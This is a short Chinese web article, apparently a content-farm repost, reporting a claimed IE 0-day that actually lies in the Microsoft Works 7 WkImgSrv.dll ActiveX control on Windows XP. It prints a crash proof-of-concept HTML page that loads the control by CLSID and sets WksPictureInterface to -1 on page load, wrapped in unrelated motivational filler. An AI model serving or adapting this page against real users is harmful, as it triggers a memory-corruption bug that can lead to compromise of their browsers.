IE 0day漏洞 问题出自MS Works

很多时候我们都不知道,自己的价值是多少。我们到底重不重要,我们是不是很渺小。深藏在心中的那一套,人家会不会觉得可笑。不要认为自己没有用,不要老是坐在那边看天空。如果你自己都不愿意动,还有谁可以帮助你成功。
近几天网络上流传着一个传说为IE0DAY的POC代码,在XP系统环境下通杀了IE6和IE7,其它系统并未经过测试。其实这个漏洞并不是存在于IE,而是Microsoft Works的组件被挖掘出漏洞,部分的XP预装了Microsoft Works,所以就出现了过全补丁系统的漏洞(如华硕易PC 就预装了Microsoft Works)。
  影响的DLL版本:Microsoft Works 7 WkImgSrv.dll (7.03.0616.0)   以下为crash POC   <html>
  <head>
  <title>Microsoft Works 7 WkImgSrv.dll crash POC</title>
  <script language=”JavaScript”>
function payload() {
var num = -1;
obj.WksPictureInterface = num;
}
  </script>
  </head>
  <body onload=”JavaScript: return payload();”>
  <object classid=”clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6″ id=”obj”>
  </object>
  </body>
  </html>

本文IE 0day漏洞 问题出自MS Works 到此结束。当你伸出两个指头谴责别人时,佘下的三个指头恰恰是指着自已的。小编再次感谢大家对我们的支持!

标签: